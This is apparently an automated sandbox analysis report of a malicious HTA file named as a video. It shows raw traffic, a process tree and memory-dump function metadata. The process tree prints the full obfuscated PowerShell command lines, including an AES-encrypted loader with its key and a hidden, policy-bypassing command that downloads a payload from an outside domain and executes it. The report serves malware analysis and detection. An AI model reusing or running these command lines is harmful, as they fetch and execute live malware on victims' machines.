2024-12-30 18:17:53 UTC	1369	IN	Data Raw: 74 63 74 57 74 72 63 71 34 78 61 45 65 47 38 57 4e 78 58 6b 4e 59 47 66 6e 62 44 47 6f 58 4b 35 5a 38 63 31 4d 65 68 73 32 44 71 33 2f 30 75 58 72 69 53 33 4c 72 78 65 56 67 67 34 4e 4f 55 6e 68 36 79 67 75 36 6a 6d 56 72 78 6d 39 79 4a 45 36 46 2b 44 43 76 48 54 42 5a 75 2f 4b 37 6b 56 75 45 5a 58 43 30 77 67 67 41 57 4c 6f 71 4b 79 73 63 35 56 6d 6c 58 58 50 6a 50 4c 65 38 6c 59 39 4e 49 64 76 4e 49 71 38 79 2b 6c 50 55 63 41 56 42 72 70 47 72 71 36 2f 4c 61 50 32 6b 62 6a 66 39 77 6c 53 74 41 69 2f 68 32 58 6c 43 71 66 67 41 33 34 4a 36 39 35 55 77 34 4d 4e 38 63 4c 72 35 2b 39 6c 72 44 78 59 6f 55 68 31 32 63 63 30 57 66 45 48 6f 54 45 45 36 65 7a 42 38 77 32 71 55 39 35 50 53 38 78 77 6e 47 2b 69 70 33 31 6a 76 67 57 74 69 47 50 61 67 43 78 49 76 63 Data Ascii: tctWtrcq4xaEeG8WNxXkNYGfnbDGoXK5Z8c1Mehs2Dq3/0uXriS3LrxeVgg4NOUnh6ygu6jmVrxm9yJE6F+DCvHTBZu/K7kVuEZXC0wggAWLoqKysc5VmlXXPjPLe8lY9NIdvNIq8y+lPUcAVBrpGrq6/LaP2kbjf9wlStAi/h2XlCqfgA34J695Uw4MN8cLr5+9lrDxYoUh12cc0WfEHoTEE6ezB8w2qU95PS8xwnG+ip31jvgWtiGPagCxIvc
2024-12-30 18:17:53 UTC	1369	IN	Data Raw: 39 65 63 4b 2f 63 48 6d 6e 68 35 43 41 6b 78 35 7a 4c 58 72 4f 4f 35 7a 74 68 79 37 31 66 35 41 44 58 49 57 63 59 70 39 4d 6c 56 70 37 55 74 38 6d 6d 65 57 43 38 76 4d 42 4c 61 4e 61 6e 56 73 4b 53 50 6f 31 65 4f 63 74 6b 65 47 65 4e 55 68 54 53 77 6c 41 61 75 6c 77 62 78 4d 71 4a 45 52 44 6f 79 4c 70 30 6d 67 74 54 6a 39 63 76 45 59 37 68 63 2f 32 55 46 33 6a 6e 6b 43 59 62 70 56 39 65 52 49 76 4d 54 76 6e 42 63 44 78 41 6f 34 69 71 41 6e 34 47 62 6c 4f 38 54 68 6e 62 37 4f 78 6e 78 52 4f 45 45 71 2f 51 57 71 74 49 41 7a 79 6a 51 57 79 6b 54 47 52 58 6a 63 34 75 74 6b 49 36 72 2f 45 43 48 4a 76 30 71 42 2f 4a 52 2b 67 65 54 6b 7a 65 45 6a 48 50 45 4d 61 52 65 56 44 6f 34 46 74 55 70 75 4a 4f 50 38 59 66 66 51 75 46 6a 36 68 34 6d 35 69 37 70 4c 76 4c 37 Data Ascii: 9ecK/cHmnh5CAkx5zLXrOO5zthy71f5ADXIWcYp9MlVp7Ut8mmeWC8vMBLaNanVsKSPo1eOctkeGeNUhTSwlAaulwbxMqJERDoyLp0mgtTj9cvEY7hc/2UF3jnkCYbpV9eRIvMTvnBcDxAo4iqAn4GblO8Thnb7OxnxROEEq/QWqtIAzyjQWykTGRXjc4utkI6r/ECHJv0qB/JR+geTkzeEjHPEMaReVDo4FtUpuJOP8YffQuFj6h4m5i7pLvL7
2024-12-30 18:17:53 UTC	1369	IN	Data Raw: 37 4f 4e 72 31 77 58 32 73 44 4e 73 63 73 6a 49 53 4c 72 4a 65 6a 62 70 46 52 31 7a 38 36 75 6e 4c 6f 50 50 76 32 56 35 79 49 4a 2b 30 5a 70 45 35 59 47 67 77 55 7a 69 65 74 30 4a 57 4f 74 73 5a 31 6b 56 58 35 41 55 50 32 55 74 51 72 6c 73 77 79 70 4b 30 6e 35 79 6d 36 62 69 73 73 4c 78 2f 47 4a 49 75 7a 73 62 47 6d 38 6b 75 55 66 38 38 52 48 4f 31 42 30 67 53 4d 6d 7a 4b 49 76 42 58 73 62 71 38 39 65 53 55 54 50 66 59 77 6e 72 72 38 6e 35 4c 54 45 4a 46 65 38 78 6c 42 74 30 54 48 42 4b 72 76 42 36 57 4c 4c 4d 51 72 6a 31 42 6b 47 53 4d 45 39 77 4b 43 74 72 47 49 71 2f 39 4c 6e 46 58 6f 4f 68 7a 30 4c 76 51 44 6b 70 51 78 6d 4a 45 74 32 57 2b 67 65 69 6f 33 54 42 6e 73 4b 35 53 32 74 34 36 76 35 45 47 59 61 38 59 69 51 2f 73 69 30 41 32 6f 39 43 47 48 76 Data Ascii: 7ONr1wX2sDNscsjISLrJejbpFR1z86unLoPPv2V5yIJ+0ZpE5YGgwUziet0JWOtsZ1kVX5AUP2UtQrlswypK0n5ym6bissLx/GJIuzsbGm8kuUf88RHO1B0gSMmzKIvBXsbq89eSUTPfYwnrr8n5LTEJFe8xlBt0THBKrvB6WLLMQrj1BkGSME9wKCtrGIq/9LnFXoOhz0LvQDkpQxmJEt2W+geio3TBnsK5S2t46v5EGYa8YiQ/si0A2o9CGHv

Target ID:	0
Start time:	13:14:57
Start date:	30/12/2024
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	mshta.exe "C:\Users\user\Desktop\web44.mp4.hta"
Imagebase:	0x9f0000
File size:	13'312 bytes
MD5 hash:	06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	13:14:58
Start date:	30/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function edSX($vXCW){return -split ($vXCW -replace '..', '0x$& ')};$lUxv = edSX('A31F9B9673349AFE3B35F831884A152ADF6EC95559396B5F57D0E445E50347CF7164B0CDC68178F82B54654182EB897B5224571B2475EFD970B415458A7AF789FC1E6F7ABBFF5A67EBB9C103A46965E4B312951120DDD87FDAA3DC376F7EB96A063404F5B45999454184A2BBA29F2CB28EA21A2DA856B254CC0F3BFD7FBCDF179A40AF3A54D7A9C674CC8BB41E0C4FD97C7113C648A150674D11EC4AD48559848466FBB95FE08C8526FBFA39058B783166A23AE29F4DA0CF61DC080DFC185C0793C8E21A60AF85E83785E482739FE2AF207C5F01D57E37973B829781481ABDCE8569691AFD4276B4F5A07138F03A1BEA59CD80A67D128F1F59B5F08CD14560906ADC8FC07ECEACD2CA936BF14DD67C0C322A614DA8949AAE4F3F3DD8C4963919366C68E97BE23A086EA39D6E3567274098AE593624ACBD21A7AA02CDE0168602BEA805BA25CAB6368F6F34EA5F73DE61B4BD7C0CA3FF765FEE92A3FF56F66AC139EA96B5A4189ECC7256D4AEBE2026C1ACAFA195958FBE0CF912FEE6E99CA63092E010DF6B7742F3AC98BBD4B06F22EC971C9EC6E3ABCB27953F51DF704695B061AC6BEC33C1B700DBA4BB023B15DA076C042FAA3A95A07706C8AE7E88553450F62468B509FEA6D5CB4350A584FBB2D977F158D34857F26CCC849BE780CB8166B92B610B64C3334FCE35D8F1F478230DAE6C3E86CF93844296A874DEEC71EC4B6694A2AD0018F51C2572849BC046EAC16B467EAB7E6229F03DC638AA510B63A4EBACB32766940CCE7DAF1FCF4F63C76BE1C97A0A09F5362D2D1417AF18230B809ACD1D1F225F4EFC165C55A8BC086346DC9D3715EC116DE095878D1134ADD3C14DC8125EB0D61BEC915BCE4B6FB0EF0A1BDBBE7E3A1F66B8842FC06096AF4E459E3AB4313C4793DCA582EC173E0DAC64534C8B839898A145779CF154674C0AE6F37B54D6B4B13E79735CC2476D5784F96960B10D71A61AB4B67A58B61390249E457FF1005BEB7ACF7A43EE2768E04D4F6FEF537A461B936EE4C0D1808455EBC1927A1E4FC80E91C69F015D288EC31966605CA3FAC7BDFE119B9780C54C172AB01029519B661359B035D477BFE75C71BA1D61A3FD4C7C56A2E76386F7B937A5DDE32CCE6982DEE8E464B2F0D40D595F50EC1801407ADB67F18011AE692B6F0BAA0465ACC91F95CC572304B79D3582A2AEA5F4453DFA1D7E39F5531233C6359F55D33BE19A911559F608653DFD08BBAF79AF2B0917D6EEBE46595756FB41358F33598CCF1E7BE52592115909F9E75477B49B50BA1E60CFBAECFE4AAF4141B07F42C5D596954C405EB172D697BDC63DCEBF8001CA89829E354D2DA20DC9739369899AF53E537DA7B73870831EEFEF889845BBDCF9501654607CF133DCDB9D67420AFC78AA9092BD52A145B944360F0BFECDC7D4932028F16E87771AC1D866EBEC7289803D86ED9904AFDFBFBF5BB048929DB7DB2AC8F63C7EDB203F8E1A174EBE2157AE182E3DBDED3349D83D3D3BC6745E2D5DF17346843FF66DB2BDFC5716E26800477742AF6898AD106316D2237BE4FADEE711172BE9B793AFE378904EC0F53DEE91616E5612EDE3DFB0863A38BAEFACED7F01D988DDCA3304F15DB3A3C71E8CA78B9035B71F7D878AE021C1C142705EC1CBA01FF772D3D880B207B97552700D5D050FE7D8F10D439FF89CEC8E7F26390CBB53F8B2F2E00092A567DDCE5162D4A1597C086F61B398754D709679F2E64B246D6B19AA8BCC08D2AA9B4B391B538D4260FF70CCD920892870858B847D56EAE7A4C64CD4F4C47355F52A842C2647543A4410AB6F0BB68693D79D2DC1A5FAF21241F5C66270CDE2DDD2DEF48DA7DA406D1A0A40075E041A292A5BEAAD267D3D4ED90575F605397391B20AF0B0020D8533E080691845C6A97A37F6782F4C741D9A038423C502F9B4B92EE6E0B4478D1356F52573E4DE57496D7A6B773C3CC0A190750625F496DB4B22EEFDFFBC405BDA4D6CE5435B9C16288D414EE8E349A3BF9838C48BA07E0867323DDE4E5572601FA9BB120B55CAA324190E009A27764C940845385969A28951E751A0CF0728A964D5C51EBD9544AC4990BE672CAD7B396BBEF89DFDE80BE842526D86ABE4AA6D1E4BFD25AE60A3DEA1F3E2F846876ED249DE784062CBFBE27EFA4819F4765FF1CC015C83F07E6577CCAB21BE70428AD1ACA3C7E6AC62B68C837C4EA37BA7CED0CDE8AD0C4965F1E5021692C033B66402108063C23CED961183A6DD2C1CFC144B8EFF515734FC6B27E6016B97A7F1AB09F93CBED2E3137401C7368545EB1501A01BBF0E8804C5BE4D172BD6CFF7B3034A37A747061BDA44FB7F7919AC363B942444431CAA18E395133309FE68CE150110C94D38790C8DC33EECF26DFF39F4228577E191BE871694949D7C9654C230AA47959522BB12AB4FDE8CB97C660CACEEA2FE5C73301DAFFD1257E3BB3995CB00392184D42E752DB81EF1B8D61C080C8147C57576290FA10D3AB2EFC9A53B2CB8532A3BC9FC528DE59C06CCF66239E212D42A9D08766166B97F5F6EFF342D75DACCCD170CE578C7F249D15A39AC37FA59BD875AA27FA3BBF895D6AA2FE42B0F2492CCB838F55FFABC2DBBB229CF7047EABAE7F2C418CC4F83F307BC2110A574B66D76555DCAEAF4A03900042D57B839B2A542B79417BD601DE47779284C49E227317E879E01F0696F2AF0EAD0A8D5383B0082FCA2472677B395EC38C0AB310841BBE741A906976E5611C65708F804FA66E89A4C7D5CF7A33CCD94D4C83E062BBA4B786AB5ACB75AC235F97058A2FD8FFDF355A495709F07B03A0C26194723473FA90E5C3D03BBFB38845DEB5C9ECF6AC7B909DBC0BEE6A9D9EB34826E09B638F7F209EF7ADAE7E4FBF01C05D4CBC93AD140D12D5D949275FA9A7D00565497C06C18666D6EF0BDAEE6A765CFF58371F12F0BEC97E55B427776A2D5FBCCA5E0800BAECFB8E5B21D8EB205921E0D9C5F75B9031ED7CC4062F26832446A2A2E200073651C4C229A0687FEC12976E205DACC5D0EE8');$IWmh=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((edSX('4B786D724A434A7546627358426F6C4F')),[byte[]]::new(16)).TransformFinalBlock($lUxv,0,$lUxv.Length)); & $IWmh.Substring(0,3) $IWmh.Substring(129)
Imagebase:	0xeb0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	13:14:58
Start date:	30/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	13:15:06
Start date:	30/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command SI Variable:\s9q 'https://cdn1.klipbazyxui.shop/web44.dle';Set-Variable d47 ([Net.WebClient]::New());.(GV xect).Value.(((GV xect).Value\|Get-Member)[6].Name).(((GV xect).Value.(((GV xect).Value\|Get-Member)[6].Name)\|Get-Member\|?{$_.Name-ilike'd'}).Name)((GV xect).Value.(((GV xect).Value\|Get-Member)[6].Name).GetCommandName('In-Exion',$TRUE,$TRUE),[System.Management.Automation.CommandTypes]::Cmdlet)(LS Variable:d47).Value.(((([Net.WebClient]::New()\|Get-Member)\|?{$_.Name-ilike'Dg'}).Name))((Get-Variable s9q -ValueOn))
Imagebase:	0x7ff6d64d0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2954035753.0000000008C90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	13:15:06
Start date:	30/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	13:16:26
Start date:	30/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Imagebase:	0xeb0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Function 0A661000 Relevance: 1.4, Strings: 1, Instructions: 116COMMON

Download Yara Rule

Strings

!, xrefs: 0A661098

Memory Dump Source

Source File: 00000000.00000003.2138980697.000000000A661000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A661000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_a661000_mshta.jbxd

Similarity

API ID:
String ID: !
API String ID: 0-2657877971
Opcode ID: b11dc629c24aa2ac4ce5da14fffd70cf43f2ac89bfdc2e57f8988ddba92d7d98
Instruction ID: 46e2a5a807b0c2aacc8bcc37cb03f903a3d8abaa607fefbc237961bcbdd81a97
Opcode Fuzzy Hash: b11dc629c24aa2ac4ce5da14fffd70cf43f2ac89bfdc2e57f8988ddba92d7d98
Instruction Fuzzy Hash: 0D414738704304AFEF208E95C8827B9F7F1EB46354F4442A9EE54C7381C7B89C458B92

Function 06130F9F Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2139005924.0000000006130000.00000010.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6130000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
Instruction ID: 4a5405a80ac75a9bda7c9fb69f7d4b7421f825bfe165882ac196ca85df2485a8
Opcode Fuzzy Hash: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
Instruction Fuzzy Hash:

Function 06130FBF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2139005924.0000000006130000.00000010.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6130000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
Instruction ID: 4a5405a80ac75a9bda7c9fb69f7d4b7421f825bfe165882ac196ca85df2485a8
Opcode Fuzzy Hash: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
Instruction Fuzzy Hash:

Function 06130FA7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2139005924.0000000006130000.00000010.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6130000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
Instruction ID: 4a5405a80ac75a9bda7c9fb69f7d4b7421f825bfe165882ac196ca85df2485a8
Opcode Fuzzy Hash: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
Instruction Fuzzy Hash:

Function 06130FAF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2139005924.0000000006130000.00000010.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6130000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
Instruction ID: 4a5405a80ac75a9bda7c9fb69f7d4b7421f825bfe165882ac196ca85df2485a8
Opcode Fuzzy Hash: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
Instruction Fuzzy Hash:

Function 06130FC7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2139005924.0000000006130000.00000010.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6130000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
Instruction ID: 4a5405a80ac75a9bda7c9fb69f7d4b7421f825bfe165882ac196ca85df2485a8
Opcode Fuzzy Hash: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
Instruction Fuzzy Hash:

Function 06130FCF Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2139005924.0000000006130000.00000010.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6130000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
Instruction ID: 4a5405a80ac75a9bda7c9fb69f7d4b7421f825bfe165882ac196ca85df2485a8
Opcode Fuzzy Hash: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
Instruction Fuzzy Hash:

Function 06130FE7 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.2139005924.0000000006130000.00000010.00000800.00020000.00000000.sdmp, Offset: 06130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_6130000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
Instruction ID: 4a5405a80ac75a9bda7c9fb69f7d4b7421f825bfe165882ac196ca85df2485a8
Opcode Fuzzy Hash: f6937b0f6e4796e53302bfaf4f5259f35123f2f05f922ce79dad98c0efd1a1dc
Instruction Fuzzy Hash:

Analysis Process: powershell.exePID: 6396, Parent PID: 2180COMMON

Executed Functions

Function 04F3CB78 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2132347364.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5c8cd549dec90f49123180b4f338ee724ce59f3ff7c82a87e007ff3baa44f8c
Instruction ID: c2e73e1c7d82758dc05d778d5fbc30601fed756285f63683ba9231d3add8e5ab
Opcode Fuzzy Hash: a5c8cd549dec90f49123180b4f338ee724ce59f3ff7c82a87e007ff3baa44f8c
Instruction Fuzzy Hash: 4DB17072E00249CFDB10CFA9C88579DBBF2BF88745F148529E815F7254EB74A882DB91

Function 04F3D448 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2132347364.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6104ad6c512fa535bebd97610088eb9469b9b69dbf112187a51484c3c872d70
Instruction ID: db02545c7293acfd3a9a7289f82a831b46f55e390dde595e005a5043e5be73ba
Opcode Fuzzy Hash: d6104ad6c512fa535bebd97610088eb9469b9b69dbf112187a51484c3c872d70
Instruction Fuzzy Hash: 13B17071E00209CFDF14CFA9C9857ADBBF2BF88315F148529D815EB254EB74A846CB81

Function 07A71ED0 Relevance: 13.2, Strings: 10, Instructions: 729COMMON

Download Yara Rule

Strings

4'jq, xrefs: 07A72710
4'jq, xrefs: 07A72672
4'jq, xrefs: 07A725F6
4'jq, xrefs: 07A72704
4'jq, xrefs: 07A72666
4'jq, xrefs: 07A720F4
4'jq, xrefs: 07A72100
4'jq, xrefs: 07A727D8
4'jq, xrefs: 07A725EA
4'jq, xrefs: 07A727CC

Memory Dump Source

Source File: 00000002.00000002.2136171280.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a70000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq$4'jq
API String ID: 0-93237521
Opcode ID: 9e36333641157c9e5b9d20dcc16fdf68ba05abcf66cd76ffd15f74166cff844b
Instruction ID: 97e1ec79d5524c5ad603bf514b078b06bc9feff24ff07a159af6022bcd34e24b
Opcode Fuzzy Hash: 9e36333641157c9e5b9d20dcc16fdf68ba05abcf66cd76ffd15f74166cff844b
Instruction Fuzzy Hash: E552AAB4A102059FCB14CB68C954B6EBBB6FFC8300F548469D915AF395CB36DC46CBA2

Function 07A71618 Relevance: 10.4, Strings: 8, Instructions: 388COMMON

Download Yara Rule

Strings

$jq, xrefs: 07A718DB
$jq, xrefs: 07A71878
$jq, xrefs: 07A71894
$jq, xrefs: 07A718B0
$jq, xrefs: 07A718BC
tPjq, xrefs: 07A71914
$jq, xrefs: 07A718CF
tPjq, xrefs: 07A71920

Memory Dump Source

Source File: 00000002.00000002.2136171280.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a70000_powershell.jbxd

Similarity

API ID:
String ID: tPjq$tPjq$$jq$$jq$$jq$$jq$$jq$$jq
API String ID: 0-1988145694
Opcode ID: b5c9ef7761ac91b9b83f6b516e15baf3befc8c591ea08aa07f213cea219d0f8b
Instruction ID: 1fad7e02f21bc7ace405e26ef3f967761bd1805183f918b5907515c7739654a5
Opcode Fuzzy Hash: b5c9ef7761ac91b9b83f6b516e15baf3befc8c591ea08aa07f213cea219d0f8b
Instruction Fuzzy Hash: 17C15AB27103198FCB248B69CC5067BBBF6EFC6201B18846AD525DF291DA31CD06C7E2

Function 04F39088 Relevance: 4.3, Strings: 3, Instructions: 524COMMON

Download Yara Rule

Strings

Hnq, xrefs: 04F3914E
$jq, xrefs: 04F392A2
$jq, xrefs: 04F39607

Memory Dump Source

Source File: 00000002.00000002.2132347364.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd

Similarity

API ID:
String ID: Hnq$$jq$$jq
API String ID: 0-266315406
Opcode ID: dce91815e3f83a00d6f27caf756f490bb61a621337bc8962c8363ef81350c4c6
Instruction ID: 1880813f5e59eae4ee85bddfcee574549d5b478b04cc2310448eb7a746d2dd24
Opcode Fuzzy Hash: dce91815e3f83a00d6f27caf756f490bb61a621337bc8962c8363ef81350c4c6
Instruction Fuzzy Hash: 78229634B012148FCB25DB64D854BEEB7B6BF89305F1044A9D409AB365DF75AE42CF81

Function 04F3E228 Relevance: 3.2, Strings: 2, Instructions: 731COMMON

Download Yara Rule

Strings

(Xoq, xrefs: 04F3E45F
LRjq, xrefs: 04F3E37D

Memory Dump Source

Source File: 00000002.00000002.2132347364.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd

Similarity

API ID:
String ID: (Xoq$LRjq
API String ID: 0-3603458070
Opcode ID: c4824b9223360624a18f457ec62023981758b1cde2ac13142360ef19f4f04447
Instruction ID: 4459613261acfeb7d04797c83077a5d9c5d7698c4c3454cc6300bb79154c6c66
Opcode Fuzzy Hash: c4824b9223360624a18f457ec62023981758b1cde2ac13142360ef19f4f04447
Instruction Fuzzy Hash: CD623B38B00318CFDB19DB28D954B6EBBB6BF89300F1180A9D9459B395DB35AD42CF51

Function 04F3E2C1 Relevance: 2.6, Strings: 2, Instructions: 139COMMON

Download Yara Rule

Strings

(Xoq, xrefs: 04F3E45F
LRjq, xrefs: 04F3E37D

Memory Dump Source

Source File: 00000002.00000002.2132347364.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd

Similarity

API ID:
String ID: (Xoq$LRjq
API String ID: 0-3603458070
Opcode ID: 7896602a8ab2136506300ba54a090931d03aecfe4711207ae640b60549c59f23
Instruction ID: 307a17297b8f131ddec13ec2eb30f834c81ac64602e06a26781bab18c9163f86
Opcode Fuzzy Hash: 7896602a8ab2136506300ba54a090931d03aecfe4711207ae640b60549c59f23
Instruction Fuzzy Hash: 08515B34B003189FDB24CF68D950BAEBBB6FF89300F1140A9D545AB3A5DB71AD41CB91

Function 07A71EB3 Relevance: 1.5, Strings: 1, Instructions: 252COMMON

Download Yara Rule

Strings

4'jq, xrefs: 07A720F4

Memory Dump Source

Source File: 00000002.00000002.2136171280.0000000007A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a70000_powershell.jbxd

Similarity

API ID:
String ID: 4'jq
API String ID: 0-3676250632
Opcode ID: e69f37db22c662d12747871b9790687bbafdc9e1ff24350e65366705a0e7b0cc
Instruction ID: 665b394ec8239dec70a95691cd1483e50456bd682e29d05c4aaa6c687e850e9b
Opcode Fuzzy Hash: e69f37db22c662d12747871b9790687bbafdc9e1ff24350e65366705a0e7b0cc
Instruction Fuzzy Hash: 3FA17FB4A10205DFDB24CB58C944BAEBBF2BBC9304F54C069D625AB395C735DC45CBA1

Function 04F3AFFE Relevance: 1.4, Strings: 1, Instructions: 118COMMON

Download Yara Rule

Strings

$jq, xrefs: 04F3B07C

Memory Dump Source

Source File: 00000002.00000002.2132347364.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd

Similarity

API ID:
String ID: $jq
API String ID: 0-2886413773
Opcode ID: 311f43f412698094c965effa2d128271e07a2858243a371fb04a999206abd198
Instruction ID: e255dc878e176406505ac3b88ac55d35c55b4b0c58eee086ac6f957880274319
Opcode Fuzzy Hash: 311f43f412698094c965effa2d128271e07a2858243a371fb04a999206abd198
Instruction Fuzzy Hash: 885114B1D00308DFDB14DF9AC895BDEBBB5BF48310F14812AD419AB254DB74A946CF90

Function 04F3B008 Relevance: 1.4, Strings: 1, Instructions: 117COMMON

Download Yara Rule

Strings

$jq, xrefs: 04F3B07C

Memory Dump Source

Source File: 00000002.00000002.2132347364.0000000004F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f30000_powershell.jbxd

Similarity

API ID:
String ID: $jq
